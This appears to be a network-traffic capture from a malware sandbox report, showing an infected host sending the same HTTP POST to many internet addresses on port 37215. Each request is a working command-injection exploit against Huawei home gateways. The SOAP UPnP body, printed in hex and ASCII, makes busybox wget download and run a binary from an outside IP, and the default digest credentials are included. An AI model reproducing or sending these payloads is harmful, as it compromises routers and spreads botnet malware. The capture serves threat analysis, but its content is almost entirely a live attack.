                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1899192.168.2.1533488102.216.117.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948988914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1900192.168.2.155738249.26.125.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.949021101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1901192.168.2.1533850186.165.11.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.949043989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1902192.168.2.1534208156.255.113.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.951899052 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1903192.168.2.1533080156.170.44.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.951917887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1904192.168.2.1539320197.168.188.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.951941013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1905192.168.2.1551684156.126.21.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.951960087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1906192.168.2.1554140122.201.0.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.951972961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1907192.168.2.1540734222.169.151.18437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.952018976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1908192.168.2.154361045.172.244.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.952075005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
